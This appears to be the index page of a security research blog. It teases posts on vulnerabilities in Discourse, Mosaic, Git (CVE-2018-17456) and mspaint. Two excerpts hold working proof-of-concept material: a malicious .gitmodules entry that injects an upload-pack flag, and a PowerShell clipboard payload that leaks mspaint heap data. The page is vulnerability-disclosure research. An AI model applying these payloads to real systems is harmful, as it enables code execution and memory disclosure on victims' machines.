Discourse SNS webhook RCE

I was staring at this part of the code for way too long already: module Jobs class ConfirmSnsSubscription < ::Jobs::Base sidekiq_options retry: false def execute(args) return unless raw = args[:raw].presence return unless json = args[:json].presence return unless subscribe_url = json["SubscribeURL"].presence require "aws-sdk-sns" return unless Aws::SNS::MessageVerifier.new.authentic?(raw) # confirm subscription by visiting the URL open(subscribe_url) end end end The above code is an excerpt from Discourse’s AWS notification webhook handler. This handler can be triggered without further authentication under https://somedicourseinstance/webhooks/aws.
Read more →

Discoure themes OS Command Injection

Discourse offers the possibility to install themes from remote Git repositories. Before this commit it was possible to inject OS commands via a maliciously crafted theme which is pulled via Git. The root cause for the issue lay in the parsing of the .discourse-compatibility file which is a yaml file containing a mapping of the target discourse version and a git version to be checked out for that specific discourse version.
Read more →

Mosaic “0day”

While attendig WarCon in 2016 greg and I sat together in .mario’s talk My Sweet Innocence Exposed - Eleven Reasons why we will all miss you, “e”, his rants about MSIE reminded us of the fact that we both had the task of finding a Mosaic 0day still on our agenda. So the evening after the talk we sat down together and started approaching that goal. The latest version of Mosaic for Unix which can be found at ftp://ftp.
Read more →

CVE-2018-17456

I’ve gotten a couple of questions about exploitation for the recent RCE in Git. So here we go with some technical details. TL;DR Here is a PoC repository. Exploitation The .gitmodules file looks as follows: [submodule "x:x"] path = x:x url = -u./payload The actual command being injected is set by the url, -u./payload points the upload-pack flag of git clone to the payload shell script. Note also the : within the path, this part is needed to actually get the payload script executed.
Read more →

Paintbleed

Summary mspaint.exe does not properly verify Dib data from the clipboard. Therefore we can craft some Dib data in the clipboard which e.g. suggests a size of 0x100 by 0x100 pixels and contains not more than the Dib header itself. So the acutal image data rendered by mspaint.exe is its own heap data =) PoC Run the following code in PowerShell: $bytes = 40,0,0,0,0,1,0,0,0,1,0,0,1,0,24,0,0,0,0,0,136,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 [System.Windows.Forms.Clipboard]::SetData([System.Windows.Forms.DataFormats]::Dib,[System.IO.MemoryStream]::new($bytes)) Afterwards open mspaint.exe and paste. The result should be the graphical representation of some of mspaints.
Read more →